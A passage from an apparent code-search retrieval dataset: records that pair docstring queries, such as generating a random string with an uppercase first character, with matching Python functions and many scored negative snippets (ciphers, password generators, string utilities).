candidate_interim.append(l)\n\n if model_pos < 0:\n # print('hello')\n candidate_vals_interim.append(-1)\n interim_scores.append(-model_pos)\n else:\n candidate_vals_interim.append(1)\n interim_scores.append(model_pos)\n\n hash_table[cnt_paths] = candidate_interim\n intermediate_paths[cnt_paths] = candidate_vals_interim\n cnt_paths += 1\n # For the first iteration, just iterate once - all labels in one iteration\n if start == 0:\n start = 1\n break\n\n temp_paths = intermediate_paths\n interim_zip = zip(intermediate_paths, interim_scores)\n sorted_scores = sorted(interim_zip, key=lambda x: x[1], reverse=True)[:5]\n intermediate_paths, scores = zip(*sorted_scores)\n\n temp_cand = []\n temp_val = []\n for i in range(len(intermediate_paths)):\n temp_cand.append(hash_table[intermediate_paths[i]])\n temp_val.append(temp_paths[intermediate_paths[i]])\n # candidate_scores[i] += scores[i]\n\n candidate_paths = temp_cand\n candidate_vals = temp_val\n print(candidate_paths)\n print(candidate_vals)\n # print(scores)\n # candidate_scores = scores\n\n # Exit condition from loop\n # if max(interim_scores) < min_score:\n # break\n #\n # min_score = min(interim_scores)\n\n iter += 1\n if iter > 5:\n break\n\n candidate_dict = {}\n for i in range(5):\n for c in range(len(candidate_paths[i])):\n if candidate_paths[i][c] not in candidate_dict:\n candidate_dict[candidate_paths[i][c]] = candidate_vals[i][c]\n elif candidate_dict[candidate_paths[i][c]] != 2:\n if candidate_dict[candidate_paths[i][c]] != candidate_vals[i][c]:\n candidate_dict[candidate_paths[i][c]] = 2.\n\n print(candidate_dict)\n exit()\n return candidate_dict" ]
[ "0.63042134", "0.6114993", "0.60271513", "0.57289815", "0.5670463", "0.56503326", "0.5637356", "0.56303936", "0.56074744", "0.55963916", "0.55750257", "0.5551854", "0.55409104", "0.55060744", "0.5505066", "0.5496916", "0.5489299", "0.5472598", "0.5471783", "0.5469413", "0.54585576", "0.5436822", "0.5431973", "0.5422025", "0.54209435", "0.54023135", "0.5395122", "0.5394043", "0.539095", "0.5360029", "0.5351787", "0.534769", "0.53409463", "0.53387696", "0.533672", "0.53271616", "0.5323371", "0.5318978", "0.53078735", "0.5303853", "0.5287954", "0.52846736", "0.52816814", "0.52806324", "0.52786136", "0.52783144", "0.52701867", "0.5265666", "0.5263008", "0.525754", "0.5257396", "0.5253716", "0.5252516", "0.52510434", "0.5247669", "0.52409625", "0.5239471", "0.52277136", "0.52233815", "0.5220306", "0.52180356", "0.52162474", "0.5214723", "0.5214658", "0.5214141", "0.5213613", "0.5213613", "0.5213613", "0.5205398", "0.5203822", "0.51935446", "0.519025", "0.51892304", "0.51806945", "0.51742214", "0.5170968", "0.51605296", "0.5158854", "0.51587546", "0.5158311", "0.5148954", "0.5144109", "0.5139736", "0.5135115", "0.51307786", "0.5126294", "0.5120899", "0.51154524", "0.51129633", "0.5110065", "0.5105413", "0.5104214", "0.5103355", "0.51015955", "0.509914", "0.50941217", "0.50926805", "0.5086668", "0.5086346", "0.5086277", "0.5084228" ]
0.0
-1
Generates a random string of characters, which may contain numbers, uppercase letters, and lowercase letters; the first character will always be an uppercase letter.
def random_string(length=1, uppercase=False, lowercase=False):
    characters = digits
    code = str()
    if uppercase:
        characters += ascii_uppercase
    if lowercase:
        characters += ascii_lowercase
    while len(code) < length:
        character = choice(characters)
        if len(code) == 0:
            character = choice(ascii_uppercase)
        code += character
    return code
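A minimal, self-contained usage sketch for illustration only: it restates the definition above together with the imports it appears to rely on (choice from random; digits, ascii_uppercase and ascii_lowercase from string). Those imports are an assumption, since the stored snippet does not show them.

from random import choice
from string import digits, ascii_uppercase, ascii_lowercase

def random_string(length=1, uppercase=False, lowercase=False):
    # Same logic as the snippet above: build the allowed character set,
    # then draw characters one by one, forcing the first to be uppercase.
    characters = digits
    code = str()
    if uppercase:
        characters += ascii_uppercase
    if lowercase:
        characters += ascii_lowercase
    while len(code) < length:
        character = choice(characters)
        if len(code) == 0:
            character = choice(ascii_uppercase)
        code += character
    return code

code = random_string(length=8, uppercase=True, lowercase=True)
print(code)                        # e.g. "Kq7pT2fa"
assert len(code) == 8
assert code[0] in ascii_uppercase  # first character is always an uppercase letter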
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def intercambiar_mayusculas_minusculas(cad):\n\n nueva_cad = \"\"\n\n for i in cad:\n if ord(i) < 64 or ord(i) > 122:\n nueva_cad = nueva_cad + i\n elif ord(i) < 97:\n nueva_cad = nueva_cad + chr(ord(i) + 32)\n else:\n nueva_cad = nueva_cad + chr(ord(i) - 32)\n\n print(nueva_cad)\n return nueva_cad", "def reg(letter,number):\n v=ord(letter.lower())-ord('a')\n v=v<<10\n v+=number\n return v", "def generar_contrasena():\n\n mayusculas = ['A', 'B', 'C', 'D', 'E', 'F', 'G']\n minusculas = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\n simbolos = ['!', '#', '$', '&', '/', '(', ')']\n numeros = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']\n\n caracteres = mayusculas + minusculas + simbolos + numeros\n contrasena = []\n\n for i in range(15):\n caracter_random = random.choice(caracteres)\n contrasena.append(caracter_random)\n\n contrasena = \"\".join(contrasena)\n return contrasena", "def n_char_generate(self,char,n):\n return char*n", "def RandomAlphaNumChar():\n num = random.randint(0, 26 + 26 + 10)\n if num < 26:\n return chr(num + 65)\n num -= 26\n if num < 26:\n return chr(num + 97)\n return chr(num + 48)", "def compile_word(word):\r\n\r\n if word.isupper():\r\n terms = [('%s*%s' % (10**i, d)) for (i,d) in enumerate(word[::-1])]\r\n return '(' + '+'.join(terms) + ')'\r\n else:\r\n return word", "def get_alphabet(number):\n return chr(number + 96)", "def get_alphabet(number):\n return chr(number + 96)", "def char_from_number(number):\r\n\r\n base = 26\r\n\r\n rval = \"\"\r\n\r\n if number == 0:\r\n rval = 'A'\r\n\r\n while number != 0:\r\n remainder = number % base\r\n new_char = chr(ord('A') + remainder)\r\n rval = new_char + rval\r\n number //= base\r\n\r\n return rval", "def generate(length):\n alpha = map(chr, range(97, 123))\n alpha.append(' ')\n result = \"\"\n for x in range(length):\n result += alpha[random.randrange(0,27)]\n return result", "def rotate_letter(c, num):\n return chr(((ord(c) - 97) + num) % 26 + 97)", "def compile_word(word):\n \n result = ''\n for i,ltr in enumerate(word):\n result = str(10**(len(word)-i-1)) + '*' + ltr + result\n if i != len(word)-1:\n result = '+' + result\n\n return result", "def calculate_construction(self, word):\r\n \r\n construction = \"\"\r\n for c in word.lower():\r\n if c in self.vowels:\r\n construction += \"v\"\r\n elif c in letters:\r\n construction += \"c\"\r\n return construction", "def convert_to_alphabet(c, avoid_tab_and_lf=False):\n if c == 1:\n return 32 if avoid_tab_and_lf else 9 # space instead of TAB\n if c == 127 - 30:\n return 92 if avoid_tab_and_lf else 10 # \\ instead of LF\n if 32 <= c + 30 <= 126:\n return c + 30\n else:\n return 0 # unknown", "def decrypt_cesar(new_word, number): #3\n decrypted_num = []\n for char in new_word:\n char = ord(char)\n decrypted_num.append(char)\n\n decrypted_word = []\n for num in decrypted_num:\n num = num - number\n decrypted_word.append(chr(num))\n\n return \"\".join(decrypted_word)", "def random_alpha_num_char():\n num = random.randint(0, 26 + 26 + 10)\n if num < 26:\n return chr(num + 65)\n num -= 26\n if num < 26:\n return chr(num + 97)\n return chr(num + 48)", "def majuscule(string):\n\n res = \"\"\n toChange = True\n\n for letter in string:\n value_letter = ord(letter)\n isLetter = 65 <= value_letter and value_letter <= 92 or 96 <= value_letter and value_letter <= 122\n if isLetter:\n if toChange:\n res += chr(ord(letter) - 32)\n else:\n res += letter\n toChange = not toChange\n else:\n res += letter\n\n print(res)", "def change(coor):\n return chr(coor[0] + 65), coor[1] + 1", "def 
_algorithm(self, rut):\n suma = 0\n multi = 2\n for r in rut[::-1]:\n suma += int(r) * multi\n multi += 1\n if multi == 8:\n multi = 2\n return u'0123456789K0'[11 - suma % 11]", "def gen_chars(length, character):\n return ''.join([character for i in range(length)])", "def generate_sequence(sequence):\n if sequence[len(sequence) - 1] == 'Z':\n return sequence + \"A\"\n\n s = SeqGen(26, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n\n if sequence[0].isdigit() and sequence[0] == '9':\n sequence = list(sequence)\n sequence[0] = 'A'\n sequence = ''.join(sequence)\n elif sequence[0] == 'Z':\n sequence = list(sequence)\n sequence[0] = '0'\n sequence = ''.join(sequence)\n sequence = sequence[0] + increment(sequence[1:], s)\n else:\n sequence = list(sequence)\n sequence[0] = (chr(ord(sequence[0]) + 1))\n sequence = ''.join(sequence)\n return sequence", "def __generate_number_boleto_fake(self):\n numbers = \"0123456789\"\n return \"\".join(random.choice(numbers) for character in range(48))", "def encryptionMultipleRotate(text, power):\n s = text\n transformedChar = \"\"\n transformedChar = s[-power:] + s[:-(power)]\n\n print(\"Multiple Rotation Encrypted text : \" )\n return transformedChar", "def com(num):\n if num < 10:\n cad = '0000'+str(num)\n elif num < 100:\n cad = '000'+str(num)\n elif num < 1000:\n cad = '00'+ str(num)\n elif num < 10000:\n cad = '0'+ str(num)\n else:\n cad = str(num)\n return cad", "def letter_num(num: int):\n if abs(num) > 26 or num == 0:\n let = ord('a') + 26 - 1\n else:\n let = ord('a') + abs(num) - 1\n return chr(let)", "def compile_word(word):\n # Your code here.\n if word.isalpha() and word.islower():\n return word\n if not word.isalpha():\n return word\n result = []\n mul = 1\n word = word[::-1]\n for w in word:\n if w.isalpha and w.isupper():\n result.append(str(mul) + '*' + w + \"+\")\n else:\n result.append(w)\n mul = mul*10\n ans = ''.join(result)\n return ans[:-1]", "def random_charachter() -> chr:\r\n return chr(int(random.randrange(32, 126, 1)))", "def generateNchars(inputChar, inputNum):\n return inputChar * int(inputNum)", "def num_alphabet(first_val: str, second_val: str):\n el_1 = ord(first_val) - ord('a') + 1\n el_2 = ord(second_val) - ord('a') + 1\n distance = abs(el_2 - el_1 - 1)\n return f'Позиции букв: {el_1} и {el_2}. 
Между буквами символов: {distance} '", "def get_direction_letters(d):\n d_letters = ('N', 'NNE', 'NE', 'ENE', 'E', 'ESE', 'SE', 'SSE', 'S', 'SSW', 'SW', 'WSW', 'W', 'WNW', 'NW', 'NNW')\n x = int((d + 11.25) / 22.5) % 16\n return d_letters[x]", "def generador_password(tamm):\n\tif tamm == 0:\n\t\treturn chr(randint(33,122))\n\telif tamm == 2:\n\t\treturn chr(randint(33,47)) + generador_password(tamm-1)\n\telif tamm == 5:\n\t\treturn chr(randint(48,57)) + generador_password(tamm-1)\n\telif tamm == 10:\n\t\treturn chr(randint(65,90)) + generador_password(tamm-1)\n\telif tamm == 13:\n\t\treturn chr(randint(97,122)) + generador_password(tamm-1)\n\telse:\n\t\treturn chr(randint(33,122)) + generador_password(tamm-1)", "def wc(seq):\n return \"\".join(complement[nt] for nt in reversed(seq))", "def transcribe(seq):\n rna = ''\n for letter in seq:\n if letter == 'A':\n rna = rna + 'U'\n elif letter == 'T':\n rna = rna + 'A'\n elif letter == 'G':\n rna = rna + 'C'\n else:\n rna = rna + 'G'\n return rna", "def get_pattern(length = PATTERN_SIZE):\n pattern = ''\n parts = ['A', 'a', '0']\n while len(pattern) != length:\n pattern += parts[len(pattern) % 3]\n if len(pattern) % 3 == 0:\n parts[2] = chr(ord(parts[2]) + 1)\n if parts[2] > '9':\n parts[2] = '0'\n parts[1] = chr(ord(parts[1]) + 1)\n if parts[1] > 'z':\n parts[1] = 'a'\n parts[0] = chr(ord(parts[0]) + 1)\n if parts[0] > 'Z':\n parts[0] = 'A'\n return pattern", "def random_mutate(dna: str) -> str:\r\n result = \"\"\r\n for c in range(DNA_SIZE):\r\n if random.randrange(0, 100, 1) == 1:\r\n result += random_charachter()\r\n else:\r\n result += dna[c]\r\n return result", "def _getLilyAccidental(self):\n s = \"\"\n if self.accidental == 0:\n return \"\"\n elif self.accidental < 0:\n s = _LILYFLAT\n elif self.accidental > 0:\n s = _LILYSHARP\n return s * abs(self.accidental)", "def scramble(src):\n\n output = \"\"\n\n for each in src.lower():\n diff = ord(each) - ord('a')\n\n if diff >= 0 and diff < 26:\n output += chr(ord('a') + (25 - (ord(each) - ord('a'))))\n elif each >= '0' and each <= '9':\n output += each\n\n return output", "def chrNum(self, num):\n char = chr(num + 65) \n return char", "def revc(sequence):\n complements = {\n 'A': 'T',\n 'T': 'A',\n 'C': 'G',\n 'G': 'C',\n 'N': 'N',\n '.': '.',\n }\n\n def inner(sequence):\n for char in reversed(sequence):\n yield complements[char]\n\n sequence = sequence.upper()\n return ''.join(inner(sequence))", "def create_password(tamanho=12):\n from random import choice\n caracters = '0123456789abcdefghijlmnopqrstuwvxzkABCDEFGHIJLMNOPQRSTUWVXZK_#'\n senha = ''\n for char in xrange(tamanho):\n senha += choice(caracters)\n return senha", "def romanify(num):\n result = \"\"\n return result", "def decryptionMultipleRotate(text, power):\n s = text;\n transformedChar = \"\"\n transformedChar = s[power:] + s[0:power]\n\n print(\"Multiple Rotation Decrypted text : \" )\n return transformedChar", "def mcc():\n morse = {\"A\": \".-\",\n \"B\": \"-...\",\n \"C\": \"-.-.\",\n \"D\": \"-..\",\n \"E\": \".\",\n \"F\": \"..-.\",\n \"G\": \"--.\",\n \"H\": \"....\",\n \"I\": \"..\",\n \"J\": \".---\",\n \"K\": \"-.-\",\n \"L\": \".-..\",\n \"M\": \"--\",\n \"N\": \"-.\",\n \"O\": \"---\",\n \"P\": \".--.\",\n \"Q\": \"--.-\",\n \"R\": \".-.\",\n \"S\": \"...\",\n \"T\": \"-\",\n \"U\": \"..-\",\n \"V\": \"...-\",\n \"W\": \".--\",\n \"X\": \"-..-\",\n \"Y\": \"-.--\",\n \"Z\": \"--..\",\n \"0\": \"-----\",\n \"1\": \".----\",\n \"2\": \"..---\",\n \"3\": \"...--\",\n \"4\": \"....-\",\n \"5\": \".....\",\n \"6\": 
\"-....\",\n \"7\": '--...',\n \"8\": \"---..\",\n \"9\": \"----.\",\n \".\": \".-.-.-\",\n ',': \"--..--\"}\n\n print(morse[input('enter character to be converted').upper()])\n\n print(\n f'{morse[input(\"1:\").upper()]} '\n f'{morse[input(\"2:\").upper()]} '\n f'{morse[input(\"3:\").upper()]} '\n f'{morse[input(\"4:\").upper()]} '\n f'{morse[input(\"5:\").upper()]} '\n f'{morse[input(\"6:\").upper()]}')", "def CHAR(table_number):\n return unichr(table_number)", "def vigenere(phrase, clef, operation):\n sortie, i = \"\", 0\n for caract in phrase: #parcours de la chaine a traiter\n if operation == \"1\": #chiffrement\n sortie = sortie + chr((ord(caract) + ord(clef[i])) % 256)\n i = i + 1 #parcours de la cle\n if i > len(clef) - 1:\n i = 0 #fin de cle atteinte, on repart au debut\n elif operation == \"2\": #dechiffrement\n sortie = sortie + chr((ord(caract) - ord(clef[i])) % 256)\n i = i + 1\n if i > len(clef) - 1:\n i = 0\n return sortie", "def string(self,pos_0,pos_1,n):\r\n n=int(n)\r\n if pos_0 <10:\r\n pos_0=\"00\"+str(pos_0)\r\n elif pos_0<100:\r\n pos_0=\"0\"+str(pos_0)\r\n\r\n if n <10:\r\n n=\"0\"+str((n))\r\n \r\n\r\n\r\n if pos_1 <10:\r\n pos_1=\"00\"+str(pos_1)\r\n elif pos_1<100:\r\n pos_1=\"0\"+str(pos_1)\r\n\r\n\r\n\r\n\r\n #pos\r\n c=\"\"\r\n\r\n c=str(pos_0)+str(pos_1)+str(n)\r\n #print(\"c\",c)\r\n return c", "def random_char(alph):\n char = alph[rand_generator.randrange(len(alph))]\n return char", "def chr_mod(value: int) -> str:\n return Base64._CHARSET[value % len(Base64._CHARSET)]", "def base26(w):\n val = 0\n for ch in w.lower():\n next_digit = ord(ch) - ord('a')\n val = 26*val + next_digit\n return val", "def vec(c):\n nth_c = ord(c) - 97\n vector = [0]*26\n vector[nth_c] = 1\n return vector", "def rot(c,n):\n if 'a' <= c <= 'z': \n new_ord = ord(c) + n\n if new_ord > ord('z'):\n new_ord = new_ord - 26\n elif 'A' <= c <= 'Z': \n new_ord = ord(c) + n\n if new_ord > ord('Z'):\n new_ord = new_ord - 26\n else: \n new_ord = ord(c)\n return chr(new_ord)", "def as_chern_chars(self):\n #value = self.as_chern_chars_dict.get(self)\n if True: #value == None:\n \n #print \"on space\", self.space, \"with lambda_\", self.degree\n upto = ceil(self.degree/2.0)+1\n \n S = PowerSeriesRing(SR, \"t\")\n f = ( sum( [factorial(2*i - 2) * ExprWithData.get_gen(chern_char(self.space, 2*i-1)).expr * S.gen()**(2*i-1) for i in range(1, upto)] ) ).exp(self.degree+1)\n #print f\n #print f.coefficients()\n value = ExprWithData(f[self.degree]) #wow, way faster to use indexing rather than coefficients list\n #self.as_chern_chars_dict[self] = value\n return value", "def caesar(m, ch, shift, modulo, start):\n if (m == CipherMode.M_DECIPHER):\n shift = -shift\n\n n = (ch-start) + shift\n n = n % modulo\n if n < 0:\n n += modulo\n return start + n", "def int_to_alpha(num):\n remainder = num\n text = []\n if num >= 26:\n major = remainder // 26\n text.append(ascii_lowercase[remainder // 26 - 1])\n remainder -= major * 26\n text.append(ascii_lowercase[remainder])\n return \"\".join(text)", "def rot(c, n):\n if 'a' <= c <= 'z':\n l = ord(c) + n\n if l > ord('z'):\n l -= 26\n return chr(l)\n elif 'A' <= c <= 'Z':\n l = ord(c) + n\n if l > ord('Z'):\n l -= 26\n return chr(l)\n else:\n return c", "def invertir_cadena(texto):\n if isinstance(texto, str):\n resultado = ''\n\n for i in range(len(texto) - 1, -1, -1):\n resultado += texto[i]\n \n return resultado\n else:\n raise TypeError('No se ha especificado una cadena de caracteres como argumento.')", "def make_control_character():\n # Add one character made 
up of one codepoint each from\n # (High Surrogates + High Private Use Surrogates) and Low Surrogates.\n # We expect each such pair to behave as a single high-codepoint\n # character.\n controls = ('0000', '001F')\n return [unicode_char(char)\n for char in range(int(controls[0], 16), int(controls[1], 16)+1)]", "def gen_alphabet():\n for x in list(xrange(ord('a'),ord('z')+1)):\n yield chr(x)", "def prefer_alphabet(i):\n if 0 <= i <= 25:\n return chr(i + 65)\n if 26 <= i <= 51:\n return chr(i + 97 - 26)\n return str(i)", "def generate(\n self, length=None, uppercase=None, lowercase=None, digits=None, special=None\n ):\n if length is None:\n length = self.length\n \n allowed_chars = \"\"\n\n if uppercase is not None:\n allowed_chars += ascii_uppercase if uppercase else \"\"\n elif self.uppercase:\n allowed_chars += ascii_uppercase\n\n if lowercase is not None:\n allowed_chars += ascii_lowercase if lowercase else \"\"\n elif self.lowercase:\n allowed_chars += ascii_lowercase\n\n if digits is not None:\n allowed_chars += all_digits if digits else \"\"\n elif self.digits:\n allowed_chars += all_digits\n\n if special is not None:\n allowed_chars += punctuation if special else \"\"\n elif self.special:\n allowed_chars += punctuation\n\n return \"\".join(choice(allowed_chars) for _ in range(length))", "def genereaza_codificare():\n codificare = \"\"\n litere_alfabet = get_litere_alfabet()\n while len(codificare) < 26:\n litera_aleasa = random.choice(litere_alfabet)\n litere_alfabet.remove(litera_aleasa)\n codificare += litera_aleasa\n return codificare", "def toRoman(n):\n pass", "def to_alphabet(self, number):\n if not isinstance(number, int):\n raise TypeError('number must be an integer')\n\n result = ''\n al_len = self.alphabet_len\n\n if 0 <= number < al_len:\n return self.__alphabet[number]\n\n while number != 0:\n number, i = divmod(number, al_len)\n result = self.__alphabet[i] + result\n\n return result", "def _get_random_number_code(self):\r\n return \"str(random.randint(0, 1e9))\"", "def gen_code():\n return ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(10)])", "def letter_code(letter):\n value = ord(letter.lower()) - ord('a') + 10\n return value + value // 11", "def english(number):\r\n if number == 0:\r\n return 'zero'\r\n word = ''\r\n for step in itertools.count():\r\n number, rest = divmod(number, 1000)\r\n word = format_num(en3(rest), step) + word\r\n if number == 0:\r\n return word.strip()", "def primera_palabra_mayuscula(cadena):\n palabras = cadena.split(\" \")\n frase_final = \"\"\n for palabra in palabras: # recorro la palabra separada \n frase_final += palabra.capitalize() + \" \" # agarro la palabra separado y la primera letra la pongo en mayuscula \n return frase_final", "def rotate(word_to_rotate,how_much):\n\thow_much-=26*(how_much/26)\t\n\t\n\tlength=len(word_to_rotate)\n\tk=0\n\tword=[0]*len(word_to_rotate)\n\twhile k < length:\n\t\tm_ord=ord(word_to_rotate[k])+how_much\n\t\tif m_ord>122:\n\t\t\tm_ord-=26\n\n\t\tm_chr=chr(m_ord)\n\t\tword[k]=m_chr\t\t\n\t\t#print m,\n\t\tk=k+1\n\tword2=''.join(word)\n\treturn word2", "def minuscule(product):\n product = product.lower()\n return product", "def construct(self, current, target):\n nfilled = int(current / target * self.length)\n return self._filledChar*nfilled + self._emptyChar*(self.length-nfilled)", "def create_character() -> list:\n return [0, 0]", "def get_litere_alfabet():\n litere_alfabet = list()\n prima_litera_alfabet = 97\n ultima_litera_alfabet = 97 + 26\n for litera in 
range(prima_litera_alfabet, ultima_litera_alfabet):\n litere_alfabet.append(chr(litera))\n return litere_alfabet", "def random_char():\n return chr(random.randrange(32, 126, 1))", "def get_complement(c):\n if c == 'A':\n return 'T'\n if c == 'C':\n return 'G'\n if c == 'G':\n return 'C'\n if c == 'T':\n return 'A'", "def alphabator(lst):\r\n n = 0\r\n for item in lst:\r\n n += 1\r\n if isinstance(item, int) and 1 <= item <= 26:\r\n item = chr(64 + item)\r\n yield item", "def RandomAlphaNumWord(length):\n return ''.join([RandomAlphaNumChar() for _ in range(0, length)])", "def decade(palabra):\n try:\n return palabra[:-1] + '0'\n except:\n return palabra", "def string(self):\n text = \"\"\n for char, qty in self.chars.items():\n text += char * qty\n return \"\".join(sorted(text))", "def GenZeroStr(n):\n\n return \"\".join([\"0\"] * n)", "def mostraCotxe(self):\n return str(self._l[0])+\" \"+str(self._l[1])+\" \"+str(self._l[2])+\" \"+str(self._l[3])", "def encode(num):\n encode = ''\n \n if (num < 0):\n return ''\n \n while (num >= base_count): \n mod = num % base_count\n encode = alphabet[mod] + encode\n num = num // base_count\n \n if (num):\n encode = alphabet[num] + encode\n \n return encode", "def base_alphabet(cls, value):\n assert type(value) is str\n key_length = len(value)\n return sum(\n cls.RANGE ** (key_length - (x + 1)) * ord(value[x])\n for x in range(key_length)\n )", "def init_letters():\n return ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',\n 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',\n 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I',\n 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R',\n 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z')", "def to_morze(text: str) -> str:\n\n\tmorze = {\"A\":\".-\",\"B\":\"-...\",\"C\":\"-.-.\",\"D\":\"-..\",\"E\":\".\",\"F\":\"..-.\",\n\t\"G\":\"--.\",\"H\":\"....\",\"I\":\"..\",\"J\":\"-.-.\",\"K\":\"-.-\",\"L\":\".-..\",\"M\":\"--\",\n\t\"N\":\"-.\",\"O\":\"---\",\"P\":\".--.\",\"Q\":\"--.-\",\"R\":\".-.\",\"S\":\"...\",\"T\":\"-\",\n\t\"U\":\"..-\",\"V\":\"...-\",\"W\":\".--\",\"X\":\".-..\",\"Y\":\"-.--\",\"Z\":\"--..\"}\n\n\ttextMorze = ''.join([morze.get(c.upper(), ' ') for c in text])\n\n\treturn textMorze", "def _abc(i):\n if i < 26:\n return ABC_STRING[i]\n else:\n return _abc(i - 26) + ABC_STRING[i % 26] # sexy sexy recursion", "def fill_in(formula):\n letters = \"\".join(set(\"\".join(re.findall(\"[A-Z]+\", formula))))\n # print(letters)\n for digits in itertools.permutations('1234567890', len(letters)):\n table = str.maketrans(letters, ''.join(digits))\n yield formula.translate(table)", "def generate_password():\n numbers = ['0', '1', '2', '3', '4', '5'] \n chars = [\"A\", \"B\", \"C\", \"D\", \"E\"]\n temp_passs = \"\"\n temp_pass = \"\"\n\n for i in range(4):\n rand_num = random.choice(numbers)\n temp_pass += temp_pass.join(rand_num)\n # rand_chars = random.choice(chars)\n for i in range(4):\n rand_chars = random.choice(chars)\n temp_passs += temp_passs.join(rand_chars)\n return(temp_pass + \"-\" + temp_passs)", "def ord(s):\n pass", "def create_random_code(chars=AVAIABLE_CHARS):\n return \"\".join(\n [choice(chars) for _ in range(SIZE)]\n )", "def get_complement(nucleotide): # This one works\n nuc = list(nucleotide)\n count = 0\n complement = ''\n for element in nuc:\n if element == 'A':\n nuc[count] = 'T'\n elif element == 'T':\n nuc[count] = 'A'\n elif element == 'C':\n nuc[count] = 'G'\n elif element == 'G':\n nuc[count] = 'C'\n complement = complement + nuc[count]\n count = count + 1\n return 
complement", "def giveReadablePassword():\n import random\n words = [\n 'Alpha',\n 'Bravo',\n 'Charlie',\n 'Delta',\n 'Echo',\n 'Foxtrot',\n 'Golf',\n 'Hotel',\n 'India',\n 'Juliet',\n 'Kilo',\n 'Lima',\n 'Mike',\n 'November',\n 'Oscar',\n 'Papa',\n 'Quebec',\n 'Romeo',\n 'Sierra',\n 'Tango',\n 'Uniform',\n 'Victor',\n 'Whiskey',\n 'Xray',\n 'Yankee',\n 'Zulu']\n\n chars = [\n '!',\n '#',\n '$',\n '%',\n '&',\n '*',\n '-',\n '.',\n ':',\n '?',\n '@' \n ]\n\n\n random.seed()\n pw = ''\n pw += random.choice(words)\n pw += random.choice(words)\n pw += random.choice(chars)\n pw += \"{:04d}\".format(random.randint(0,10000))\n return pw", "def render_to_numeral_system(n: int, alphabet: str) -> str:\n assert n >= 0\n assert len(alphabet) == len(set(alphabet))\n if n == 0:\n return alphabet[0]\n b = len(alphabet)\n reverse_digits = []\n while n > 0:\n reverse_digits.append(alphabet[n % b])\n n = n // b\n return \"\".join(reversed(reverse_digits))", "def generate_password(self, length):\n items = [\"a\", \"e\", \"i\", \"o\", \"u\", \"1\", \"2\", \"4\", \"5\", \"7\", \"8\", \"9\"]\n\n new_password = \"\"\n while(len(new_password) < length):\n item = items[randint(0, len(items) - 1)]\n new_password += item\n return new_password", "def create_word(char_list):", "def rand_string():\n out = ''\n for _ in range(24):\n out += choice(ascii_letters)\n return out", "def random_alpha_num_word(length):\n return ''.join([random_alpha_num_char() for _ in range(0, length)])", "def letter_for(label):\n return \"ABCDEFGHIJ\"[label]", "def change(st):\n return ''.join('1' if a in st.lower() else '0' for a in map(chr, range(97, 123)))", "def carte_to_string(carte):\r\n symboles = [str(i+1) for i in range(10)] + [\"V\", \"D\", \"R\"]\r\n couleurs = [\"♥\", \"♦\", \"♣\", \"♠\"]\r\n res = symboles[carte[0] - 1] + couleurs[carte[1] - 1]\r\n return res", "def transforme(n):\n if n<10 :\n return '0'+str(n)\n else :\n return str(n)" ]
[ "0.6781998", "0.64925814", "0.6049585", "0.5974472", "0.5921979", "0.58175975", "0.58117867", "0.58117867", "0.5776275", "0.5770409", "0.57647777", "0.57624525", "0.5754226", "0.57396114", "0.573307", "0.5721849", "0.5701658", "0.5699352", "0.5680936", "0.56807214", "0.56601375", "0.5654664", "0.56449497", "0.56413025", "0.5621481", "0.56064427", "0.5592871", "0.55834574", "0.5575394", "0.5565895", "0.55526334", "0.55451137", "0.5542032", "0.55213505", "0.5514988", "0.5510811", "0.55014735", "0.54948497", "0.5485197", "0.5484041", "0.5480018", "0.54783636", "0.54782367", "0.54757947", "0.54672956", "0.54640216", "0.5463717", "0.54594004", "0.54582214", "0.5446594", "0.5443737", "0.5440429", "0.54038024", "0.53986114", "0.53944904", "0.5393995", "0.5382405", "0.53629166", "0.53617823", "0.53609866", "0.53604746", "0.5355241", "0.53541553", "0.53378844", "0.5337163", "0.5329411", "0.5312533", "0.5306369", "0.5286218", "0.52824175", "0.5279591", "0.52739227", "0.526845", "0.526749", "0.52550197", "0.52521235", "0.5247073", "0.52344525", "0.523056", "0.5227793", "0.52208984", "0.52205104", "0.52199316", "0.52190846", "0.52189463", "0.5216344", "0.5215233", "0.52145034", "0.5214136", "0.5212768", "0.52116984", "0.5210096", "0.5199035", "0.51977193", "0.5197358", "0.5192259", "0.51844007", "0.51823676", "0.51706046", "0.51703215", "0.5168918" ]
0.0
-1
Job handler. Returns True on success, False on failure or raise exception. Depending on result, on_success, on_failure or on_exception
def handler(self, *args, **kwargs): return True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _handle_success(self, result_ttl: int, pipeline: 'Pipeline'):\n # self.log.debug('Setting job %s status to finished', job.id)\n self.set_status(JobStatus.FINISHED, pipeline=pipeline)\n # Result should be saved in job hash only if server\n # doesn't support Redis streams\n include_result = not self.supports_redis_streams\n # Don't clobber user's meta dictionary!\n self.save(pipeline=pipeline, include_meta=False, include_result=include_result)\n # Result creation should eventually be moved to job.save() after support\n # for Redis < 5.0 is dropped. job.save(include_result=...) is used to test\n # for backward compatibility\n if self.supports_redis_streams:\n from .results import Result\n\n Result.create(self, Result.Type.SUCCESSFUL, return_value=self._result, ttl=result_ttl, pipeline=pipeline)\n\n if result_ttl != 0:\n finished_job_registry = self.finished_job_registry\n finished_job_registry.add(self, result_ttl, pipeline)", "def handle_job_success(self, job):\n super().handle_job_success(job)\n\n self._handle_job_status(job, \"finished\")", "def _handle_task_succeeded(self):\n if self.on_success:\n return self.on_success(self)\n else:\n return HandlerResult.cont()", "def check_job_status(job):\n assert isinstance(job, PreprocessJob),\\\n 'job must be a PreprocessJob'\n\n if job.is_finished():\n return True\n\n return True\n \"\"\"\n ye_task = AsyncResult(job.task_id,\n app=preprocess_csv_file)\n\n if ye_task.state == 'SUCCESS':\n\n if ye_task.result['success']:\n\n preprocess_data = ContentFile(json.dumps(ye_task.result['data']))\n\n new_name = 'preprocess_%s.json' % get_alphanumeric_lowercase(8)\n job.metadata_file.save(new_name,\n preprocess_data)\n job.set_state_success()\n\n 